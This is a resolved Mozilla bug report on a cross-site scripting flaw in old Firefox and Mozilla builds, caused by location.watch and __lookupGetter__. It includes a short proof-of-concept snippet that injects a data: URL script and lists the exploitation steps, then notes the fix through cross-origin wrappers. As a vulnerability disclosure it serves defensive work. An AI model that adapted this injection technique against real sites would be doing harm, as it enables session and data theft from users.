361961 - XSS by using location.watch("href") and Object.prototype.__lookupGetter__ or __lookupSetter__

Status: RESOLVED FIXED

(Core :: DOM: Core & HTML, defect)

Description

[moz_bug_r_a4]

This XSS attack only works against certain sites that are using scripts that
try to change a parent window's location.href.

An attacker can run script with a target site's principal by using
location.watch("href", ...) and Object.prototype.__lookup(G|S)etter__ method
that came from an xbl compilation scope or a target site's global scope.

  <marquee id="m">
  func = m.init.__lookupGetter__;
    or
  <iframe src="target site">
  func = frames[0].location.__lookupGetter__;

  location.watch("href", func);
  location.__lookupGetter__("href").toString = function() {
    return "data:text/html,<script> ... </script>";
  };

1. A target site's script executes |top.location.href = foo|.
2. __lookupGetter__("href", undefined, foo) is called on the location object in
   top window, and it returns the location.href getter function.
3. The href getter function's toString() method is called and returns a data:
   url.
4. The data: url is loaded with the target site's principal.


This affects the trunk, fx2.0.0.1, fx1.5.0.9, fx1.0.8 and moz1.7.13.

Comment 1

[moz_bug_r_a4]

Attachment: testcase 1 - using xbl compilation scope's Object.prototype.__lookupGetter__

Comment 2

[moz_bug_r_a4]

Attachment: testcase 2 - using target site's Object.prototype.__lookupGetter__

Comment 3

[Daniel Veditz [:dveditz]]

The "watch" part reminds me of bug 354978, but that one is fixed now and doesn't do anything to stop these testcases.

Comment 4

[Damon Sicore (:damons)]

Targeting to B1 per conversation with Blake. 

Comment 5

[Blake Kaplan (:mrbkap) (inactive)]

Fixed by cross origin wrappers.